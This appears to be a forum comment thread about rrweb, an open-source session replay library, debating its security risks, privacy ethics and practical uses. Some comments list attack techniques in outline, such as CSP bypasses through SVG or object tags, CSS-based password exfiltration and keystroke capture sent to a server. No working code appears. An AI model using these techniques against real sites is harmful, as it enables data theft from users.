However, as a session replay industry competitor and a former security researcher for most industry players, I caution anyone thinking of using a side-project like this on production applications to proceed slowly with care.
Security and Privacy are extremely hard to get right here. The tricky thing about session replay analytics is that attackers have a huge attack vector, and compromise means gaining a treasure trove of all user data. The nature of replay is in a way a form of XSS. Modern security features help (like CSPs, iframe Sandbox attribute) but browser changes can cause issues.
Some of the challenges:
- CSPs can often be bypassed using Google API libraries, <Object/>, <SVG>
- Blacklisting <SCRIPT/> tags can often be bypassed with an XML namespace
- CSS based data or password exfiltration.
- Clickjacking, "data:" urls etc.
- Could you imagine a web request proxy server deploying Service Workers?
- postMsg() from further nested frames
Substantial work goes into sandboxing replay environments and limiting PII. Defense in depth is particularly important here. Enterprise level research, auditing, monitoring and care should be taken seriously.
Quote from my introduction blog post:
Today we already have some commercial session replay products like Logrocket, Fullstory, etc.
If you are just looking for a ready-to-use tool and would like to pay for its service, I would recommend you to use the above products, because they have well-tested backend services that can store the data for you and perform some higher order features.
So I don't think rrweb is a competitor of these commercial products.
Actually, I would like to see rrweb grows into a base of many commercial products in the future, which means it handles most of the privacy and security issues, so the other developers can build many fancy projects base on it without spending time on the hard part again and again.
One idea I've been toying around with is a tool that records their movements through our site when testing, aggregating them, and then being able to show hot and cold spots of out site that they hit on their full site run throughs.
I haven't really dug into your code yet, but it sounds like this might be a good base for that or am I way off base in thinking that?
Companies like Walgreens should be entirely to blame.
I really do appreciate how they author(s) in that report uncovered how those services where used in practice.
[I'm not with any party listed in the report]
Or some great resources maybe?
I know of the obvious ones like OWASP; but that only scratches the surface.
I've wanted to write a deep dive on JS defense for a while now. Lots of cool stuff learned I'd love to share- maybe in the next few weeks.
Please do! :)
Since I've seen some people are talking about the open source idea and comparing rrweb to some commercial products, I'd like to share a blog post about the vision of rrweb.
Also, you will know about how rrweb works in this post.
Really interested to see how this compares.
I did see the IE11 issue. Are there any thoughts on what can be implemented for a fallback?
BTW, rrweb is also a project to explore the power of modern browser, so IE issues may not be considered in a high priority.
Has this been normalised? Is this the new default?
Food for thought.
If the privacy implications make us uncomfortable we might want to start not sharing this kind of information from browsers by default (this seems unlikely) or at least introducing some sort of browser-level controls. Unfortunately, this represents a lot of work and worries about breaking backwards compatibility contrasted with very little gain for browsers that don't pride themselves on being good for privacy(Chrome).
> In addition to being nonfree, many of these programs are malware because they snoop on the user. Even nastier, some sites use services which record all the user's actions while looking at the page. The services supposedly “redact” the recordings to exclude some sensitive data that the web site shouldn't get. But even if that works reliably, the whole purpose of these services is to give the web site other personal data that it shouldn't get.
Always using the most extreme terms just makes it easier to dismiss such views outright.
A friend of mine got a suspicious tax returns email that had a link to a form asking for credit card information. Being careful and responsible, my friend of course asked me if the site looked legit before actually pressing 'submit'.
Of course it was a scam site, and using session recording, they could very well have gotten my friend's credit card details without per pressing 'submit'.
I think it's always the context that decides whether something is malware. Is a program that erases everything on your disk malware? Perhaps, but if it's a disk formatting tool and you asked it to do so, then it's not.
FWIW you probably wouldn't need something as powerful or blunt as session recording to pull this off, though. You'd only need to listen for keystrokes on the relevant input (with document.addEventListener or similar), and send them to the server as they're typed. Same with partially-filled surveys. IIRC Facebook got in some heat a while ago for sending the partially-typed messages up to the server and to the other chat participant.
Inside your local team you can of course share the recording simply as JSON files, via github and other services.
Another advantage of using browser extensions like kantu, selenium ide and imacros is that they are more powerful by design, but that is another topic.
So another passion of rrweb is to teach people the 'power' of the modern browsers, and I also wish rrweb has a chance to improve the standard of web privacy.
Nice way would be to do some recording for a week or so. Get any sessions that obviously were quite long and the user didn't achieve anything. Go through them and try improving UX so the user won't get stuck there the next time.
Very good work. I am actually a little surprised something like this is open source.
May consider switching and using your library!
Thanks for sharing this :)
Few years ago, I created something very similar when working for validately.com - user testing company. The solution was tailored for our needs and was quite unique and rather sophisticated.
Below few main points:
- automatic injection of recording script by proxing original site / app via our domain (optionally user's could have inject the script by themselves)
- using iframe to serve the recorded page in order to preserve context and allow to display content on top of the page
- audio recording
- broadcasting in real-time
- storing all assets from a recording (images / stylesheets) to make playing back independent from original urls
Not everything was perfect and there were always something to improve. Some sites did not work at all due to technical limitations. But the technology was good enough so the company could grow and transit to webrtc based solution.
I am very grateful for this rare opportunity as the project taught me insane amount of useful stuff. Would love to work on something similar again.
A table and interacting with a table, the cells would just be filler elements. Form field data just wouldn't be captured, contents unique to any record on a page would be filled with sample data.
That way you get to see how someone interacts with a page, but not any context/personal information.
I think relying on sensible defaults or redacting data is a lost cause and puts the trust/responsibility in the wrong hands. Some companies may care about redaction while others don't prioritize it.
I mean, come on, how smooth is this library?
I checked the DOM of a angularjs app and when I enter something in the input field, its not appearing in the DOM at all.
This wouldn't pass the first hurdle at my dayjob...